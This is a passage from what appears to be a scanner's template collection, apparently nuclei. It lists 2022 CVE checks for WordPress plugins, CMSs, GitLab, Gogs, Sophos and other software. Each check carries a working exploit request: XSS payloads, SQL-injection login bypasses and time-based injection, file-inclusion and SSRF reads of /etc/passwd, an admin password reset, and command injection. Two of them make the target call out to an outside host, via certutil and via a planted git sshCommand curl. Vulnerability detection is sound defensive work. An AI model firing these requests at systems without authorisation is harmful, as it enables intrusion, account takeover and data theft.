charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware 